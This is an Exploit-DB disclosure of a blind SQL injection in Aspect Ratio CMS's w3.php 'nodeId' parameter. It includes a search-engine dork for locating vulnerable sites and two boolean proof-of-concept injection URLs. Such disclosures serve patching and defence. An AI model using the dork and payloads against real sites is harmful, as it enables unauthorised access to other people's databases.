Aspect Ratio CMS Blind SQL Injection Vulnerability

ID EDB-ID:15205
Type exploitdb
Reporter Stephan Sattler
Modified 2010-10-04T00:00:00


Aspect Ratio CMS Blind SQL Injection Vulnerability. Webapps exploit for php platform

                                            # Author: Stephan Sattler //
# Software Website:
# Software Link:
# Dork: inurl:w3.php?nodeId=
[ Vulnerability ]

# Explanation:

$_GET["nodeId"] isn't sanitized before executing the database query.
An attacker can use this for a blind SQL injection attack.

# Exploiting the Vulnerability // PoC:

URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=1 - will show the page
URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=0 - will show an error page by aspect ratio Cms